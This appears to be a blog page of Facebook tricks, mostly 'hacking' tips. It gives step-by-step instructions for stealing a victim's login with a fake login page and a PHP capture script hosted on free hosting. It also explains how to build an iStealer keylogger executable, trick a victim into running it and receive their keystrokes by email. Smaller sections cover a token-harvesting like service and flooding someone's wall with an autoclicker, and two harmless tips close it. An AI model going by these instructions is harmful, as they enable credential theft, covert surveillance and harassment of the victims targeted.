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New11 8Hack facebook a/c using fake login page
1.First of all we need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords (login.php) You can download both the files from HERE2. To Get The Password ClickHERE3. Now openlogin.php , which we downloaded earlier with a note pad and search for the term and replace it with the site address where you want the victim to be redirected , finally save it. 4.Now create an account at Free web hosting site like 000a.Biz 110mb.com,xtgem 5. Now upload both the files (fake.html,login.php )to your hosting account and send the fake.html (fake facbook login page) link to your victim 6.Now when the victim enters all his credentials, like login name and password in our fake login page and when he clicks login He will be redirected to site which we did in step 3 7.Now to see the victims id ,password, login to your hosting account" where you will see a new file "password.txt" .Open it to see the victims user id and the password Note:- If your still confused, you can watch video on Hack a Facebook Account Using a Fake login Page
NHack facebook a/c using remote keylogger
How To Use This Remote Keylogger :- *.Download keylogger from below and extract that http://www.4shared.com/file/ j8j5q3eO/iStealer_30.html? *.Give them the required information *.Create New Gmail Account Specially for keylogger ( its recommended ) *.And Log that gmail username and password in keylogger *.Now Click on build *.It will create a server.exe *.Send that Server.exe to victim and ask them to run *.You have done everything now. you will receive the logs(that means everything victim types on his keyboard)to the given gmail account. Using this trick,you can hack all types of a/cs :d

NBHow To Increase Likes On Facebook Status
1. Go To Powerliker.com2. Get Access Token By Allowing The App Called Causes ( It'd be in your URL Bar )3. Enter The Access Token 4. Enter in Power Liker v2.0 5. Enter The Status Id Or Photo Id. 6. Wait & Watch
NFlood your enemy's facebook wall
At first what we need for this trick is autoclicker v2.2 pls download autoclicker from the official HERE3) Go to friends, then type your slave's name then click Search. Now go to your slave's profile. 4) Now for the third step- Wallpost Flood- 1) Open Auto Clicker. Change the Number of Clicks to 9999. NOTE: Leave all the settings as it is exept the Number of Clicks 2) Put your comment on the textbox. Then press F2 . NOTE: Don't put your cursor on the Post button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar 3) Now after you saw the progress of click at the taskbar place your cursor on the Post button. 4) Now leave your cursor on the Post button while the Auto-Clicker runs. Leave it for atleast a minute. 5) Finished. You've just flooded his wall
NAccess facebook pc site in your mobile
Hi friends! Today i'm going to tell you a simple trick to access facebook pc site in your mobile.
First login to your fb a/c from mobile site then open enter address in options(#1 shortcut in opera),it looks like m.facebook.com/something now you erase m. and press go,its done now you will see the system site.
Note:Opera users turn of mobile view and uc users turn on zoom view for a perfect pc look.

NSend underline and bold text in facebook chat
Im Going To Tell You How To Send Bold & Underline Text In Facebook Chat 1. Underline Text ==> When Using Fb Chat Just Type Words between (_) Example : _I LOVE HACKING_ = I LOVE HACKING 2. Bold = When Using Facebook Chat Just Type Words Between (*) EXAMPLE : * I love Facebook * =I love Facebook

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